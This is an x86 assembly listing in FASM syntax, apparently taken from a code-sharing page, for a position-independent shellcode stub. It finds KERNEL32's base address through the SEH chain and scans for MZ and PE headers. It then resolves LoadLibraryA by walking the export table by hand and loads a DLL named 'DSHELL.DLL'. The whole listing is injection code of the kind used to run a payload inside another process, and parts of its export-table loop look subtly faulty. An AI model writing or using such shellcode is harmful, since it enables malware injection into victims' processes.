include tools fasm include win32a inc use32 push edi push esi find KER

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
include "D:/tools/fasm/include/win32a.inc"
use32
push edi
push esi
; find KERNEL32 base address using info from SEH
mov eax, [fs:0]
mov eax, [eax+4]
and eax, 0xFFFFF000
@@:
sub eax, 0x1000
cmp word [eax], 0x5A4D ; "MZ"
je found_some_base
jmp @b
found_some_base:
mov edx, eax
add edx, [eax+0x3C]
cmp dword [edx], 0x00004550 ; "PE\0\0"
je found_some_peheader
jmp exit
found_some_peheader:
; now eax contains base address of KERNEL32
; and edx contains address of PE header
mov ebx, eax
call @f
db "LoadLibraryA",0
@@: pop edi
call get_proc_addr
call @f
db "DSHELL.DLL",0
@@: call eax
exit:
pop esi
pop edi
ret
; get_proc_addr
; in edi: char* lpszFuncName
; in edx: PEHEADER*
; in ebx: HANDLE hModule
; out eax: void* lpFuncAddress
get_proc_addr:
mov edx, [edx+0x78] ; RVA of Export table
add edx, ebx
push edx
mov eax, [edx+0x18] ; number of names
mov edx, [edx+0x20] ; RVA of arrayOfNames
add edx, ebx
cld
get_proc_addr__loop:
mov esi, [edx+eax*4]
add esi, ebx
push edi
strcmp__loop:
cmpsb
jne strcmp__ne
cmp byte [esi], 0
jne strcmp__loop
get_proc_addr__name_found:
pop edi
pop edx
mov ecx, [edx+0x24] ; ords table
add ecx, ebx
movzx ecx, word [ecx+eax*2]
; sub eax, [edx+0x10] ; index in funcs table = K - base
mov eax, [edx+0x1C]
add eax, ebx ; funcs table
mov eax, [eax+ecx*4]
add eax, ebx ; function address
ret
strcmp__ne:
pop edi
dec eax
test eax, eax
jnz get_proc_addr__loop
ret
end_of_file: